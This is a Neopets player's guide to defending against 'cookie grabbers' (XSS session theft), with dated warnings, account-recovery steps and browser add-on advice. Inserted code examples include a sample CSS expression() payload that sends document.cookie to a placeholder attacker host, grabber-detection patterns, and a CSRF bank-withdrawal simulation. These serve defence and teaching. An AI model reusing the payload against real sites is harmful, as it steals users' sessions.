Welcome to the in-depth guide to avoiding cookie grabbers. This page has been put together from background information on how they work, reverse engineering of various CG scripts and first-hand research. (plus losing 800k+ in trades along the way, but hey, it's priceless!!)

CG'd? 1. Log out. 2. Log in. 3. Change password. 4. Done. Why? Click here

Frozen? Click here for details


Questions? Please neomail/webmail(dmitri_stanislaus) or contact me on NeoMallers (saudor)

NOTICE: If you are unable to see the images on this page after installing RequestPolicy, you will either have to allow requests from neopets.com to neomallers.com or view this page in a browser that is not logged into Neopets, since the images are hosted on the NeoMallers servers.

Windows 10: The F8 method of getting into safe mode does not work reliably under Windows 10, especially if you're running an SSD as your boot drive. You will need to do it from within Windows: click Start, type MSCONFIG, select the Boot tab, check "Safe boot" and restart. Don't forget to switch it back when you are done.

Dec 2015: Added a link to the NoScript configuration petpage to the useful links section.

Nov 2015: Don't be clicking links. There appears to be another round of exploits (possibly related to Flash). Some users have reported being sent links such as "click the link to see my offer on your trades", etc. Flashblock along with the regular gear (RequestPolicy, NoScript) is recommended if you decide to visit user lookups, petpages, etc.

Sept 2014: NF requests/items: Keep both of them blocked, and don't visit the lookups/user pages of users you DON'T KNOW who send you guild invitations, NF requests, or items.

Jul 2012: Neomail: Switch to plain text neomail if you haven't already done so at this link

Aug 2011: PINs: If you have not changed your PIN since August 2011, it is strongly recommended to change it now. If you changed it after August 2011, you should probably still change it (and make sure the email account tied to your Neopets account is secured. Services like Gmail offer IP address tracking that shows logins from other IPs; just learn what your own looks like. It may change slightly from time to time, but when you look it up on a WHOIS lookup service such as DomainTools, it should still show your own internet service provider.)

June 18/2011: DUPED ITEM CGs: Source: Neoboards. Users are told to search Google for a supposed list of duped items. Sample: Google -removed for your safety- (WITH QUOTES!) and click on the first neopets.com result. It is supposedly a list of users selling duped items and duped items to watch out for. This is a HUGE problem right now!

August 31/2010: Neoboard CGs: Using an image tag, CGs are being posted in neoboard topics. RequestPolicy should keep you safe from these, but regardless, be wary of board topics that "invite" you in.

August 21/2010: 'Inventory': Some users are reporting inventory items disappearing/being sent to others, so it is advisable to keep valuables in your SDB/gallery.

August 8/2010: 'Eye frame' (iframe) based CGs: be wary of people who neomail you things like "I heard you might be interested. Check my gallery" or "check my trades". Some form of CG is probably on the lookup and in the gallery.

August 8/2010: 2nd wave? CGs are on the move again, this time with the CG code encoded. Again, it probably won't run correctly in Firefox, but IE will execute it.

July 27/2010: RequestPolicy vs NoScript. Both or just one? More details on the RequestPolicy add-on have been added here. A glossary has been added too.

July 26/2010: What to do if you're frozen, added to useful links... With the new ticket system, getting an account back might not be so obvious. See below for more details. Link to an external NoScript guide added in the NoScript section.

July 25/2010: Filters updated.... Yesterday TNT updated the filters. Opening and closing quotes are now required around every link. Offsite-based CG links still seem to be getting through, however. But it's still progress.

July 21/2010: RequestPolicy FF add-on.... Tips on using this add-on correctly have been added! Please see here

July 20/2010: Jhudora.... Do not go to a site with jhudora in the name. It's a PHP/image based CG. They will say your lookup has been stolen, etc., and that you should check it out.

July 17/2010: REQUESTPOLICY FF add-on: See below. *** This is a must! NoScript alone won't help you. ***

July 16/2010: On-site cookie grabbers: Yep, on-site cookie grabbers are back. The code is embedded directly in the shop itself, and NoScript will probably not save you (because you would have whitelisted neopets.com, and not doing so is against the ToC), so it's best not to snipe at this time. This one is embedded within the width property of a style tag.

It probably won't work in Firefox, etc., judging from its rather invalid code, but it will run in Internet Explorer.
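To make the "CG hidden in a width property" idea concrete, here is an added example (not code from this page or from Neopets) of a shop-page renderer that echoes a stored width value straight into a style attribute, the same renderer with the value validated, and a quick scan for the usual signs of a grabber in fetched HTML. The IE-only CSS expression() mechanism in the sample payload is my assumption about what this CG relied on; the page only says the code sat in a width property and ran in IE but not Firefox. The host attacker.example, the /grab path and the item names are placeholders.

```javascript
// Added example, not code from the page or from Neopets. Assumption: the CG
// used IE's CSS expression(), which evaluated JavaScript inside a style value.
// attacker.example and /grab are placeholders.

// Attacker-controlled "width" (constructed sample payload). Everything after
// the first semicolon is extra CSS that IE would evaluate as script.
const maliciousWidth =
  "100px; width: expression((new Image()).src=" +
  "'http://attacker.example/grab?c='+document.cookie)";

// Vulnerable renderer: the stored layout value goes straight into the
// style attribute, so whatever the attacker saved becomes part of the page.
function renderShopItemUnsafe(name, width) {
  return `<div class="item" style="width: ${width}">${name}</div>`;
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened renderer: a width is only ever a small integer (optionally with
// "px"); anything else falls back to a default, and item text is HTML-escaped.
function renderShopItemSafe(name, width) {
  const m = /^\s*(\d{1,4})(px)?\s*$/.exec(String(width));
  const px = m ? Number(m[1]) : 100;
  return `<div class="item" style="width: ${px}px">${escapeHtml(name)}</div>`;
}

// Signs of a cookie grabber in page HTML. Case-insensitive because browsers
// tolerate any casing in tags and CSS.
const GRABBER_SIGNS = [
  /expression\s*\(/i,        // IE CSS expression()
  /document\.cookie/i,       // what a grabber actually reads
  /javascript\s*:/i,         // script-scheme URLs
  /<\s*(script|iframe)\b/i,  // injected script or "eye frame" tags
];

// Returns the patterns that matched; an empty list means nothing suspicious.
function cookieGrabberSigns(html) {
  return GRABBER_SIGNS.filter(re => re.test(html)).map(re => re.source);
}
```

Run it with node: the unsafe renderer produces a page that trips two of the patterns, while the hardened one turns the same payload into a plain 100px width. The scan is a rough heuristic for eyeballing a saved page source, not a substitute for RequestPolicy blocking the outbound request to the grabber's host.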

July 12/2010: ARMOURED NEGG: Be careful of really cheap armoured neggs! A real one is masked underneath a fake armoured negg that links to a CG site. They show up normally on the wiz but cannot be bought if you click on them, because of the invisible linked layer on top. But if you know how to edit the source code on-the-fly, you can still buy it to remove it from the SSW (so others won't get CG'd). Don't attempt this unless you know what you are doing.

Table of Contents

- Why you should log out, not change PW first

- Strongly recommended firefox addons

- Some useful links

- RequestPolicy vs. NoScript

- General Internet Safety

- Glossary of Key Terms used in this guide

- Support this page

A sample shop with CG (image)

For more details on cookie grabbing via XSS, please see the section on RequestPolicy.
Cookie grabber in shops (image)

Why you should log out first, NOT change pw first

- Neopets authentication is based on session IDs. Clicking LOGOUT deletes the session from the Neopets server, which renders the cookie (including every copy of it) useless. Logging in again creates a new session but does not delete previous sessions unless the logout link is clicked beforehand.
(Try the two-browser trick: log into your account in two browsers. You can browse around in both for a bit. Now click logout in one, and the other browser gets logged out too.) Basically, everyone gets kicked out.

The hacker, if inside your account, would be logged out too and, in order to re-enter, would need
to recover the password (if it is still stored, encrypted, within the cookie) to regain access. This gives you ample time to log back
in and change your password. In most cases, it's easier for him to just move on to the next account in the list.

If you choose to change the password first, the hacker still has access while you're doing it. Trying to change your password under pressure is no easy business. Time to log out < time to think of a new password + change it + enter it twice.

P.S. Clearing cookies doesn't work either. All it does is remove the cookies from your own system, not from anywhere else; the thief's copy is untouched.

+ Strongly recommended Firefox add-ons

A word of advice: installing these add-ons can make your browsing experience somewhat annoying, since you have to constantly allow access to trusted websites as you visit them (a huge pain when you are researching, for example, where most of the websites you visit are untrusted/new to the add-ons). Even then, more complex sites (such as Facebook apps) may still have difficulty loading properly. What you can do is use two browsers: Firefox when you need to visit user pages (or Neopets in general), and Google Chrome for your other browsing. Then use a free tool like Xmarks so your bookmarks sync and are available in both browsers.

1. NOSCRIPT - required

THE LONG AND THE SHORT OF IT: Don't forget to whitelist neopets.com and any other sites that you trust (see attachment)

Neopets may freeze your account for cheating if you restock with JavaScript disabled. An easy way to check that you have configured it properly: (1) Install NoScript. Go to your inventory and click on an item. You will notice that nothing pops up. This means it is active and scripts are being blocked. (2) Now configure it as outlined below and check again. If the item description pops up, you're good to go!
If a page you rarely visit isn't working properly, temporarily allow it as shown below. More details and how to configure it on this page here

The NoScript Firefox extension provides extra protection for Firefox, Flock, Seamonkey and other Mozilla-based browsers: this free, open source add-on allows JavaScript, Java, Flash and other plugins to be executed only by trusted web sites of your choice (e.g. your online bank), and provides the most powerful anti-XSS protection available in a browser.

NoScript's unique whitelist based pre-emptive script blocking approach prevents exploitation of security vulnerabilities (known and even not known yet!) with no loss of functionality...

You can enable JavaScript, Java and plugin execution for sites you trust with a simple left-click on the NoScript status bar icon (look at the picture), or using the contextual menu, for easier operation in popup status-bar-less windows.

Source: Noscript Homepage

2. FLASHBLOCK - strongly recommended

This allows you to selectively load Adobe Flash Player objects. If you need Flash to play games,
simply click the arrow to enable that object. This is allowed since most browsers don't even come with Flash. Do not
whitelist neopets.com, as one type of CG uses a redirection of http://images.neopets.com/flash_version_check_v1.swf? to steal cookies.

Tip: You should whitelist that video site :)

3. KEYSCRAMBLER - not required against XSS

For protection against keyloggers (programs that record everything you type). It's no use
changing your password if every key you press is being sent to the "hacker".

4. ADBLOCK - not required against XSS

It allows you to block ads... STYLISH is good too (code to block ads coming soon). If you get a pop-up ad, use CTRL+W
to close it. You definitely don't want to find yourself clicking "close" on an XP Antispyware 2009 pop-up ad (a fake anti-virus); those are the worst to get rid of.


5. REQUESTPOLICY - required

THE LONG AND THE SHORT OF IT: IF A VALID PAGE is not showing up properly, right click an empty area of the page and whitelist the blocked destinations that you TRUST. Do NOT select 'Allow requests from neopets.com', as this would allow everything on the page to get through, which defeats the purpose. Basically, this add-on can be used in its default state!

RequestPolicy is an extension that improves the privacy and security of your browsing by giving you control over when cross-site requests are allowed by webpages you visit.

Cross-site requests are requests that your browser is told to make by a website you are visiting to a completely different website. Though usually legitimate requests, they often result in advertising companies and other websites knowing your browsing habits, including specific pages you view throughout the day. Among the attacks that cross-site requests are used in, they are particularly dangerous with Cross-Site Request Forgery (CSRF) attacks where your browser is told to make a request to another website and that other website thinks you (the person) meant to make the request.

With RequestPolicy, the default for any cross-site request is to deny it. Users are notified when requests on the current page have been blocked (the status bar flag icon at the bottom right of your browser turns red). Clicking on this status bar flag icon gives you a menu where you can view and modify which requests are blocked and allowed. You can whitelist requests you approve of by origin site, destination site, or specific origin-to-destination.

Which kinds of requests are blocked? (source: requestpolicy homepage)

By default, any request the browser makes from the current site a user is on to a third-party site is blocked. Users can then whitelist specific sites (with various levels of granularity) to allow requests they approve of. The types of requests that are blocked include:

Content of the current page that is from a different site.

Various tags in an HTML page tell the browser that more content is needed to display the current page. Normally, the browser immediately makes requests to third-party sites to obtain this content. The content can include images, JavaScript files, style sheet files, and many others.

Redirections from the current site to a different site.

Redirects tell your browser to load an entirely different website address than the one you are on or requested. Redirections can be caused by JavaScript, META refresh tags, and Location headers.

RequestPolicy vs NoScript - source: requestpolicy home page

Is RequestPolicy an alternative or competitor to NoScript?

No! :)

NoScript is a tool that gives you a default deny policy for JavaScript, Java, Flash and other plugins. NoScript allows you to whitelist scripts and objects from domains you trust.

RequestPolicy is a tool that gives you a default deny policy for cross-site requests. RequestPolicy allows you to whitelist cross-site requests you trust.

How does RequestPolicy help you where NoScript does not? RequestPolicy will protect you from various attacks that NoScript will not (such as CSRF attacks, though there are some special cases that NoScript protects against) and will give you greater privacy while browsing.

Also, RequestPolicy will give you finer-grained control over JavaScript and plugins when you use it with NoScript. For example, if you whitelist a domain with NoScript to allow it to run JavaScript, then that domain will also be allowed to run JavaScript when you are on any other site that you have whitelisted with NoScript. RequestPolicy makes sure that when it is JavaScript from a third-party site, it will still be restricted unless you have allowed those cross-site requests.

Conversely, NoScript gives you protection that RequestPolicy does not. RequestPolicy will not keep you safe from malicious JavaScript or vulnerable plugins on the current site you are visiting. So, NoScript is absolutely essential for browser security.

Having two separate tools that each do their specific jobs well is the best approach. NoScript is an amazing extension and is absolutely essential (like RequestPolicy) to using Firefox securely. It is best to use both RequestPolicy and NoScript.

+ Some Useful Links

http://www.neopets.com/~ShimmeringBliss (Stuff you should know about your account in case you need to get it unfrozen)

http://www.neopets.com/remacct.phtml (Self Ice Link)

http://www.neopets.com/~Skiizzy - CGing Traps and other warning signs to watch out for!

http://www.neopets.com/~Sicano - NoScript Guide and configuration

Neomail me if you know of any other pages that should be here -thanks!

Frozen? What to do

From the NeoMallers Forums:

If you used the ticket system, hopefully you did it correctly.
- then click Submit a ticket
- select Account Inquiries, click Submit a ticket
- click My answer is not here
- select issue: Frozen Account

Note: Use a SIDE account so you can see the response to your ticket

+ General Internet Safety

Food for thought: good lightweight anti-spyware tools:

1. Comodo Firewall: This gets annoying at times, and I do not really find much use for it once you have RequestPolicy + NoScript.

2. SUPERAntiSpyware (use the portable version and reboot into WINDOWS SAFE MODE
for best effect if you are infected). It's better than the installed program since it downloads with a random file name; malware loves to disable the main program file of popular AVs like Norton and AVG.

To boot into safe mode:
Just as Windows displays the boot progress bar/Windows logo, keep pressing F8 and select
Safe Mode.

Tip: Press F8 repeatedly once the computer manufacturer's
screen disappears. (On Windows 10 use MSCONFIG instead; see the note at the top of this page.)

Glossary - summaries sourced from Wikipedia

Cookie: A cookie, also known as a web cookie, browser cookie, and HTTP cookie, is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data.


Cross-site scripting (XSS, commonly known on Neopets as CGing) holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.


Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts [like Neopets, for example]. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

For example, one user, Bob, might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references a script on Bob's bank's website (rather than an image file), e.g.,

If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.

A cross-site request forgery is a confused deputy attack against a Web browser. The deputy in the bank example is Bob's Web browser which is confused into misusing Bob's authority at Mallory's direction.
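The Bob/Mallory story above, and the RequestPolicy description earlier (default deny for cross-site requests, whitelisting by origin, destination, or a specific origin-to-destination pair), fit in one runnable sketch. This is an added example, not code from this page, from Wikipedia or from the RequestPolicy project: a toy bank with a vulnerable and a token-checked withdraw endpoint, a browser that attaches the bank cookie to an image request from a forum page, and a policy check in the RequestPolicy style that decides whether that cross-site request is even sent. The site names, the /withdraw query parameters, the cookie and token values are all constructed.

```javascript
// Added example, not from the page, Wikipedia or RequestPolicy. Site names,
// the /withdraw API, cookie and token values are constructed placeholders.

// --- the bank (server side) ------------------------------------------------
const bankSessions = new Map([['sess-bob', { user: 'bob', csrfToken: 'tok-7f3a' }]]);
const balances = new Map([['bob', 1000], ['mallory', 0]]);

function transfer(from, to, amount) {
  if (!(balances.get(from) >= amount)) return false;
  balances.set(from, balances.get(from) - amount);
  balances.set(to, (balances.get(to) || 0) + amount);
  return true;
}

// Vulnerable endpoint: the cookie alone is taken as "Bob wants this"
// (ambient authority), so any request carrying it goes through.
function withdrawUnsafe(req) {
  const s = bankSessions.get(req.cookies.session);
  if (!s) return 'not logged in';
  return transfer(s.user, req.query.to, Number(req.query.amount)) ? 'ok' : 'refused';
}

// Hardened: the request must also carry the per-session token. A page on
// forum.example cannot read it (same-origin policy), so it cannot forge it.
function withdrawSafe(req) {
  const s = bankSessions.get(req.cookies.session);
  if (!s) return 'not logged in';
  if (req.query.token !== s.csrfToken) return 'csrf check failed';
  return transfer(s.user, req.query.to, Number(req.query.amount)) ? 'ok' : 'refused';
}

// --- Bob's browser ---------------------------------------------------------
// The bank cookie is attached to *any* request to bank.example, including one
// triggered by an <img> tag that Mallory posted on the forum.
const cookieJar = { 'bank.example': { session: 'sess-bob' } };

function buildRequest(imgSrc) {
  const u = new URL(imgSrc);
  return {
    cookies: cookieJar[u.hostname] || {},
    query: Object.fromEntries(u.searchParams),
    dest: u.hostname,
  };
}

// RequestPolicy-style default deny for cross-site requests. A whitelist rule
// may name just an origin, just a destination, or a specific pair.
function policyAllows(originSite, destSite, whitelist) {
  if (originSite === destSite) return true;          // same site: not cross-site
  return whitelist.some(r =>
    (r.origin === undefined || r.origin === originSite) &&
    (r.dest === undefined || r.dest === destSite));
}

// Mallory's forum post contains this "image" (the withdrawal URL).
const malloryImg = 'http://bank.example/withdraw?to=mallory&amount=500';

// Bob views the forum: does the image request get sent, and what happens?
function scenario(whitelist, handler) {
  balances.set('bob', 1000); balances.set('mallory', 0);   // reset between runs
  const req = buildRequest(malloryImg);
  if (!policyAllows('forum.example', req.dest, whitelist)) return 'blocked by policy';
  return handler(req);
}
```

With an empty whitelist the request never leaves the browser, which is RequestPolicy's default and the reason the page calls it a must. Once bank.example has been whitelisted as a destination, the cookie-only endpoint hands Mallory the money, and only the token check on the server side still stops her; that is the "two separate tools for two separate jobs" point from the RequestPolicy vs NoScript section applied to the site itself.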


A firewall is a part of a computer system or network that is designed to block unauthorized access while permitting authorized communications. It is a device or set of devices which is configured to permit or deny computer applications based upon a set of rules and other criteria.

Support this page

the lolz - with regards to this page